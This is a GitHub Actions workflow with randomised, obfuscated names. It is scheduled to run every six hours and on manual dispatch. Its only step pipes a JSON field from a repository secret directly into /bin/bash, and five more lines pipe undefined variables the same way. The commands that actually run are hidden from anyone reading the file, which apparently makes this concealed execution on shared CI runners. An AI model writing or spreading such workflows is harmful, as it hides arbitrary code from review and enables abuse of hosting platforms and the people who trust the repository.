name: lonttouk

on:
  workflow_dispatch:
  schedule:
    - cron: '56 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lonttouk
        env:
          mxmam179: ${{ secrets.mxmam179 }}
        run: |
          echo $mxmam179 | jq -r .tqmhm3641 | /bin/bash
          echo $hg06976 | jq -r .ajpy08545 | /bin/bash
          echo $ma375 | jq -r .w0 | /bin/bash
          echo $fzsqv33359 | jq -r .d42 | /bin/bash
          echo $nrpx495 | jq -r .tsde1816 | /bin/bash
          echo $c76056 | jq -r .sbgqi219 | /bin/bash

